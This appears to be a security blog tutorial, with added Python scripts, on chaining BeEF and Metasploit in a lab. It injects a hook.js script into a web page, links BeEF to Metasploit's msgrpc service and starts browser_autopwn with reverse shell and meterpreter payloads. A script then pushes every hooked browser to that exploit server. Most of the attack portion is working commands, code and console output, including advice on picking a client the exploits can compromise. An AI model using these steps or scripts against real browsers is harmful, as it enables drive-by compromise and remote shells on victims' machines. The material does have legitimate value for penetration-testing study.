
Using BeEF together with MSF

category Security / Information Gathering   2017. 11. 13. 20:38

- BeEF + MSF

On its own BeEF can only manipulate the hooked web page, which limits what it can do as an attack tool.

If MSF can turn that hooked page into a shell on the client, a far stronger attack becomes possible: BeEF redirects the hooked browser to a Metasploit browser-exploit server, and the exploit's payload calls back to MSF.


- Systems used

Kali Linux (192.168.27.50: attacker, running BeEF, MSF and Apache)

Windows 7 (victim, browsing with Chrome)


- Preparation

(Win7)

Turn the Windows firewall off completely.

Add 192.168.27.50 and 192.168.27.50:8080 as trusted sites in the Java security settings (Java Control Panel > Security > Exception Site List), so that Java applets served from those origins are allowed to run.


- Exercise

(kali)

- Configure BeEF so it can drive MSF

# vi /usr/share/beef-xss/config.yaml

> search for metasploit and change extension: metasploit: enable to true


# vi /usr/share/beef-xss/extensions/metasploit/config.yaml

#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost=IP Pass=abc123
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
    extension:
        metasploit:
            name: 'Metasploit'
            enable: true
            host: "127.0.0.1"
            port: 55552
            user: "msf"
            pass: "abc123"
.....

> user/pass are the credentials BeEF presents to Metasploit's msgrpc service: pass must match the Pass= given to load msgrpc, and host/port must match where msgrpc listens (127.0.0.1:55552 is the plugin's default, and what this lab uses).


[TERM1]

# msfconsole

(Metasploit ASCII-art banner and Metasploit Pro advertisement omitted)

       =[ metasploit v4.14.10-dev                         ]
+ -- --=[ 1639 exploits - 944 auxiliary - 289 post        ]
+ -- --=[ 472 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > load msgrpc Pass=abc123
[*] MSGRPC Service:  127.0.0.1:55552
[*] MSGRPC Username: msf
[*] MSGRPC Password: abc123
[*] Successfully loaded plugin: msgrpc

> This loads the msgrpc plugin. With no ServerHost/ServerPort given it binds 127.0.0.1:55552 as user msf, which is exactly what the extension config above points at; Pass= must match pass: there.
> Leave this console open: as long as it runs, BeEF has something to connect to. (Do not close it.)
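A quick check that the msgrpc service is really up and accepting the credentials from extensions/metasploit/config.yaml, done before starting BeEF rather than reading "Successful connection with Metasploit" off its log. This is an added example, not BeEF or Metasploit code. It speaks Metasploit's RPC wire format (HTTP POST to the plugin's default /api/ path, body a MessagePack array of [method, args...], Content-Type binary/message-pack) with a small hand-written MessagePack codec, so it needs nothing outside the Python standard library. The host, port, user and password constants are this page's lab values; the core.version call after auth.login is simply a harmless authenticated method that proves the token works.

```python
"""Check Metasploit's msgrpc endpoint with the credentials BeEF will use.

Added example, not BeEF or Metasploit code. Wire format: HTTP POST to the msgrpc
plugin's default /api/ path, body = MessagePack array [method, args...], sent with
Content-Type binary/message-pack; the small codec covers just what this check needs.
"""
import urllib.request

RPC_HOST = "127.0.0.1"   # lab value; must equal host: in extensions/metasploit/config.yaml
RPC_PORT = 55552         # lab value; must equal port:
RPC_USER = "msf"         # msgrpc's default user; must equal user:
RPC_PASS = "abc123"      # the Pass= given to 'load msgrpc'; must equal pass:

SINGLETONS = {None: b"\xc0", False: b"\xc2", True: b"\xc3"}
CONSTANTS = {0xC0: None, 0xC2: False, 0xC3: True}
TEXT_LEN = {0xC4: 1, 0xD9: 1, 0xC5: 2, 0xDA: 2, 0xC6: 4, 0xDB: 4}  # bin8/str8 .. bin32/str32


def mp_encode(obj) -> bytes:
    """Encode nil, bool, small unsigned int, str, list and dict (all a request needs)."""
    if obj is None or isinstance(obj, bool):
        return SINGLETONS[obj]
    if isinstance(obj, int) and 0 <= obj <= 0x7F:
        return bytes([obj])                                    # positive fixint
    if isinstance(obj, str):
        raw = obj.encode("utf-8")
        if len(raw) <= 31:
            return bytes([0xA0 | len(raw)]) + raw              # fixstr
        if len(raw) <= 0xFF:
            return b"\xd9" + bytes([len(raw)]) + raw           # str8
    if isinstance(obj, (list, tuple)) and len(obj) <= 15:
        return bytes([0x90 | len(obj)]) + b"".join(map(mp_encode, obj))   # fixarray
    if isinstance(obj, dict) and len(obj) <= 15:
        return bytes([0x80 | len(obj)]) + b"".join(
            mp_encode(k) + mp_encode(v) for k, v in obj.items())            # fixmap
    raise ValueError(f"cannot encode {obj!r} with this small encoder")


def mp_decode(buf: bytes):
    """Decode nil, bool, int, str/bin (both returned as text), array and map."""
    pos = 0

    def take(n):
        nonlocal pos
        if pos + n > len(buf):
            raise ValueError("truncated MessagePack data")
        pos += n
        return buf[pos - n:pos]

    def mapping(n):
        out = {}
        for _ in range(n):                   # key must be read before its value
            key = value()
            out[key] = value()
        return out

    def value():
        b = take(1)[0]
        if b <= 0x7F:
            return b                                              # positive fixint
        if b >= 0xE0:
            return b - 0x100                                      # negative fixint
        if b <= 0x8F:
            return mapping(b & 0x0F)                              # fixmap
        if b <= 0x9F:
            return [value() for _ in range(b & 0x0F)]             # fixarray
        if b <= 0xBF:
            return take(b & 0x1F).decode("utf-8", "replace")      # fixstr
        if b in CONSTANTS:
            return CONSTANTS[b]
        if b in TEXT_LEN:                                         # length-prefixed str/bin
            return take(int.from_bytes(take(TEXT_LEN[b]), "big")).decode("utf-8", "replace")
        if b in (0xCC, 0xCD, 0xCE):                               # uint8 / uint16 / uint32
            return int.from_bytes(take(1 << (b - 0xCC)), "big")
        raise ValueError(f"unsupported MessagePack type byte 0x{b:02x}")

    return value()


def build_request(method: str, *args) -> bytes:
    """MSGRPC request body: the method name followed by its arguments, as one array."""
    return mp_encode([method, *args])


def rpc_call(method: str, *args):
    req = urllib.request.Request(
        f"http://{RPC_HOST}:{RPC_PORT}/api/", data=build_request(method, *args),
        headers={"Content-Type": "binary/message-pack"}, method="POST")
    with urllib.request.urlopen(req, timeout=5) as resp:
        return mp_decode(resp.read())


def check_msgrpc() -> dict:
    """Log in exactly as BeEF will, then prove the token works with a harmless call."""
    login = rpc_call("auth.login", RPC_USER, RPC_PASS)
    if login.get("result") != "success":        # a bad password comes back as {"error": true, ...}
        raise SystemExit(f"msgrpc rejected the credentials: {login}")
    return rpc_call("core.version", login["token"])


if __name__ == "__main__":
    print(check_msgrpc())
```

Run it on the Kali box while the msfconsole from TERM1 is open. A wrong Pass= shows up as an error reply instead of result: success, which is the same failure BeEF would hit silently at startup; the codec functions are pure, so the request and reply handling can be exercised without Metasploit present.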


[Note]
# Typing beef-xss starts BeEF in the terminal and automatically opens the browser:
-> # /usr/share/beef-xss/beef -x   /* terminal */
-> # firefox http://192.168.27.50:3000/ui/authentication &    /* browser */
The two run at the same time. (-x resets BeEF's database on start, which is why "Resetting the database for BeEF" appears in the log below.)


[TERM2]

# cd /usr/share/beef-xss

# ./beef -x

[20:11:10][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[20:11:10][*] Browser Exploitation Framework (BeEF) 0.4.7.0-alpha
[20:11:10]    |   Twit: @beefproject
[20:11:10]    |   Site: http://beefproject.com
[20:11:10]    |   Blog: http://blog.beefproject.com
[20:11:10]    |_  Wiki: https://github.com/beefproject/beef/wiki
[20:11:10][*] Project Creator: Wade Alcorn (@WadeAlcorn)
[20:11:11][*] Successful connection with Metasploit.
[20:11:15][*] Loaded 297 Metasploit exploits.
[20:11:15][*] Resetting the database for BeEF.
[20:11:16][*] BeEF is loading. Wait a few seconds...
[20:11:35][*] 13 extensions enabled.
[20:11:35][*] 550 modules enabled.
[20:11:35][*] 3 network interfaces were detected.
[20:11:35][+] running on network interface: 127.0.0.1
[20:11:35]    |   Hook URL: http://127.0.0.1:3000/hook.js
[20:11:35]    |_  UI URL:   http://127.0.0.1:3000/ui/panel
[20:11:35][+] running on network interface: 192.168.17.50
[20:11:35]    |   Hook URL: http://192.168.17.50:3000/hook.js
[20:11:35]    |_  UI URL:   http://192.168.17.50:3000/ui/panel
[20:11:35][+] running on network interface: 192.168.27.50
[20:11:35]    |   Hook URL: http://192.168.27.50:3000/hook.js
[20:11:35]    |_  UI URL:   http://192.168.27.50:3000/ui/panel
[20:11:35][*] RESTful API key: b76d4aa219fe70bcc93d9a33d78e7eb621ff0a0c
[20:11:35][*] HTTP Proxy: http://127.0.0.1:6789
[20:11:35][*] BeEF server started (press control+c to stop)

> "Successful connection with Metasploit" and "Loaded 297 Metasploit exploits" confirm the msgrpc link. If BeEF logs a failed connection instead, the msfconsole from TERM1 is not running, or host/port/pass in the extension config do not match what msgrpc printed.


 


[TERM3]

- Set up the web page that carries the hook

# cd /var/www/html

# vi index.html

<HTML>
<BODY>
<CENTER><H1> It works! </H1></CENTER>
<script src="http://192.168.27.50:3000/hook.js"></script>
<P>This is the default web page for this server.</P>
<P>The Web Server software is running but no content has been added, yet.</P>
</BODY>
</HTML>

# service apache2 restart

# firefox http://192.168.27.50:3000/ui/panel &

ID beef    PASS beef

> beef/beef is the default shipped in config.yaml (beef: credentials: user/passwd). On anything that is not a throwaway lab box change it, and treat the RESTful API key printed at startup as a secret: either one gives full control of every hooked browser.


(win7)

Open http://192.168.27.50 in Chrome. The page pulls in hook.js, which keeps polling BeEF from then on, and the browser appears under Online Browsers in the panel.


(kali)

> Metasploit now appears as a category in the Module Tree, confirming that BeEF imported the exploit list over msgrpc.


[TERM1]

> Put MSF in a listening state on 192.168.27.50:8080 with browser_autopwn.
> When the hooked browser is sent to 192.168.27.50:8080, autopwn fingerprints it, serves the exploits that match, and a successful one calls back to the handler with a session.

 

msf > search autopwn

Matching Modules
================

   Name                               Disclosure Date  Rank    Description
   ----                               ---------------  ----    -----------
   auxiliary/server/browser_autopwn                    normal  HTTP Client Automatic Exploiter
   auxiliary/server/browser_autopwn2  2015-07-05       normal  HTTP Client Automatic Exploiter 2 (Browser Autopwn)

msf > use auxiliary/server/browser_autopwn

msf auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits

msf auxiliary(browser_autopwn) > set LHOST 192.168.27.50
LHOST => 192.168.27.50
msf auxiliary(browser_autopwn) > set SRVHOST 192.168.27.50
SRVHOST => 192.168.27.50
msf auxiliary(browser_autopwn) > set URIPATH /
URIPATH => /
msf auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST    192.168.27.50    yes       The IP address to use for reverse-connect payloads
   SRVHOST  192.168.27.50    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits

msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed

[*] Setup
msf auxiliary(browser_autopwn) > 
[*] Starting exploit modules on host 192.168.27.50...
[*] ---

[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://192.168.27.50:8080/MjPAFAP
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.27.50:8080/wxdukboRudBP
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.27.50:8080/tkmLMWLsMFjO
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.27.50:8080/UUMAb
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.27.50:8080/hBja
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.27.50:8080/RWspycOuBM
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.27.50:8080/XITF
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.27.50:8080/lkHbhVMcdc
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.27.50:8080/EtWgzqAlNAyzc
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.27.50:8080/XUwe
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.27.50:8080/ZxkZEfNLNbS
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.27.50:8080/fXnpV
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.27.50:8080/FAOhYz
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.27.50:8080/pKGSUIOr
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.27.50:8080/gOlEfR
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.27.50:8080/alsNvIEWeFPP
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.27.50:8080/uohTp
[*] Server started.
[*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.27.50:8080/QNCmbskzUEE
[*] Server started.
[*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.27.50:8080/gPZL
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.27.50:8080/TzpobGJFj
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 192.168.27.50:3333 
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 192.168.27.50:6666 
[*] Started reverse TCP handler on 192.168.27.50:7777 
[*] Starting the payload handler...
[*] Starting the payload handler...

[*] --- Done, found 20 exploit modules

[*] Using URL: http://192.168.27.50:8080/
[*] Server started.

 


- From BeEF, push the hooked page over to 192.168.27.50:8080 (a forced redirect)

> Commands tab > Browser > Hooked Domain > Redirect Browser, Redirect URL: http://192.168.27.50:8080

> This sends the hooked browser to 192.168.27.50:8080, i.e. straight into the autopwn server.


(win7)

> The browser navigated there on its own.
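The redirect above is one click in the panel, but on an engagement you will want it scripted, for instance to push every browser that hooks to the autopwn URL without sitting in the UI. The script below is an added example, not BeEF project code, and drives the same Redirect Browser module through BeEF's RESTful API. It assumes the REST API as BeEF documents it (GET /api/hooks and GET /api/modules, POST /api/modules/<session>/<module id> with a JSON body of module parameters, all authenticated with ?token= set to the RESTful API key printed at startup), that the redirect module is listed with class Redirect_browser and takes a redirect_url parameter, and uses this page's lab values for the BeEF URL, API key and target. SAMPLE_HOOKS and SAMPLE_MODULES are constructed replies so the planning step runs offline.

```python
"""Push every online hooked browser to the autopwn URL via BeEF's REST API.

Added example, not BeEF code. Assumed API shape (per BeEF's REST API docs):
  GET  /api/hooks?token=KEY    -> {"hooked-browsers": {"online": {...}, "offline": {...}}}
  GET  /api/modules?token=KEY  -> {"0": {"id": 1, "name": ..., "category": ..., "class": ...}, ...}
  POST /api/modules/<session>/<module_id>?token=KEY   with the module's parameters as JSON
Assumed module: class "Redirect_browser", parameter "redirect_url".
"""
import json
import urllib.parse
import urllib.request

BEEF_URL = "http://192.168.27.50:3000"                    # UI URL from BeEF's startup log
API_TOKEN = "b76d4aa219fe70bcc93d9a33d78e7eb621ff0a0c"    # RESTful API key from the same log (lab value)
TARGET_URL = "http://192.168.27.50:8080/"                 # the browser_autopwn listener

# Constructed sample replies in the assumed shape, so the planning step can run offline.
SAMPLE_HOOKS = {
    "hooked-browsers": {
        "online": {
            "0": {"id": 1, "session": "AbCdEf0123456789", "name": "C", "version": "62",
                  "os": "Windows", "ip": "192.168.27.60", "domain": "192.168.27.50", "port": "80"},
        },
        "offline": {
            "0": {"id": 2, "session": "OldSession000000", "name": "FF", "ip": "192.168.27.61"},
        },
    }
}
SAMPLE_MODULES = {
    "0": {"id": 7, "name": "Create Alert Dialog", "category": "Browser", "class": "Alert_dialog"},
    "1": {"id": 42, "name": "Redirect Browser", "category": "Browser", "class": "Redirect_browser"},
}


def online_sessions(hooks: dict) -> list:
    """(session, ip, browser name) for each browser BeEF currently lists as online."""
    online = hooks.get("hooked-browsers", {}).get("online", {})
    return [(b["session"], b.get("ip"), b.get("name")) for b in online.values()]


def find_module_id(modules: dict, class_name: str):
    """Resolve a module's class name to the numeric id the POST endpoint wants."""
    for mod in modules.values():
        if mod.get("class") == class_name:
            return mod["id"]
    return None


def redirect_request(base_url: str, token: str, session: str, module_id: int, url: str):
    """Return (request_url, json_body) to run Redirect_browser against one hooked session."""
    path = f"/api/modules/{urllib.parse.quote(session, safe='')}/{int(module_id)}"
    query = urllib.parse.urlencode({"token": token})
    return f"{base_url}{path}?{query}", json.dumps({"redirect_url": url}).encode()


def plan_redirects(hooks: dict, modules: dict, target_url: str,
                   base_url: str = BEEF_URL, token: str = API_TOKEN) -> list:
    """Pure planning step: one (url, body) per online browser; touches no network."""
    module_id = find_module_id(modules, "Redirect_browser")
    if module_id is None:
        raise LookupError("Redirect_browser not present in the module listing")
    return [redirect_request(base_url, token, s, module_id, target_url)
            for s, _ip, _name in online_sessions(hooks)]


def api_get(path: str) -> dict:
    with urllib.request.urlopen(f"{BEEF_URL}{path}?token={API_TOKEN}", timeout=5) as r:
        return json.load(r)


def api_post(url: str, body: bytes) -> dict:
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=5) as r:
        return json.load(r)


def main():
    plan = plan_redirects(api_get("/api/hooks"), api_get("/api/modules"), TARGET_URL)
    if not plan:
        raise SystemExit("no online hooked browsers to redirect")
    for url, body in plan:
        print(url, "->", api_post(url, body))   # expected reply shape: {"success": true, "command_id": ...}


if __name__ == "__main__":
    main()
```

Only browsers under "online" are targeted: an offline session has no hook polling BeEF, so a command queued for it would simply sit until that browser ever came back, by which time the autopwn server may be gone. Run it from the Kali box after BeEF is up and at least one browser has hooked.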


(kali)

[TERM1]

 

[*] Handling '/'

[*] Handling '/?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDprbzp4ODY6Q2hyb21lOjYyLjAuMzIwMi44OTo%3d'

[*] JavaScript Report: Windows 7:undefined:undefined:undefined:undefined:ko:x86:Chrome:62.0.3202.89:

[*] Reporting: {"os.product"=>"Windows 7", "os.language"=>"ko", "os.arch"=>"x86", "os.certainty"=>"0.7"}

[*] Responding with 6 exploits

[*] Handling '/favicon.ico'

[*] 404ing /favicon.ico


msf auxiliary(browser_autopwn) > sessions

Active sessions
===============

No active sessions.

> The client was fingerprinted and served exploits, so it looks connected, but sessions shows nothing.

-> This worked in earlier runs, so the obvious guess is that a Chrome update fixed the bug. That is not quite it. The sessid in the request is just the base64 of the JavaScript fingerprint printed on the next line (Windows 7, ko, x86, Chrome 62.0.3202.89). None of the 20 modules this (old, v1) browser_autopwn started targets Chrome itself: they hit old IE, Firefox, Opera and Android WebView, or the Java and Flash browser plugins. Chrome dropped NPAPI plugin support in version 45, so the java_jre17_* modules (and the Java exception-site entries from the preparation step) have nothing to run in Chrome 62, and the six exploits autopwn responded with never produced a session.

-> Google does not distribute older Chrome builds, and a build obtained elsewhere auto-updates, so downgrading the browser is not a practical fix.

-> Waiting for Metasploit to gain a Chrome 62 exploit is not the answer either. To see this chain end in a session, point a client that the loaded modules actually target at 192.168.27.50:8080: for example Internet Explorer on the same Windows 7 box with a vulnerable JRE 1.7 plugin (the java_jre17_* modules), or browser_autopwn2 with a suitable target. The reverse handlers are on 192.168.27.50 ports 3333 (windows/meterpreter), 6666 (generic shell) and 7777 (java/meterpreter), and those must be reachable from the victim, which is why the firewall was turned off.

-> When it works, the Windows 7 host shows up under sessions and sessions -i 1 drops you into the shell.

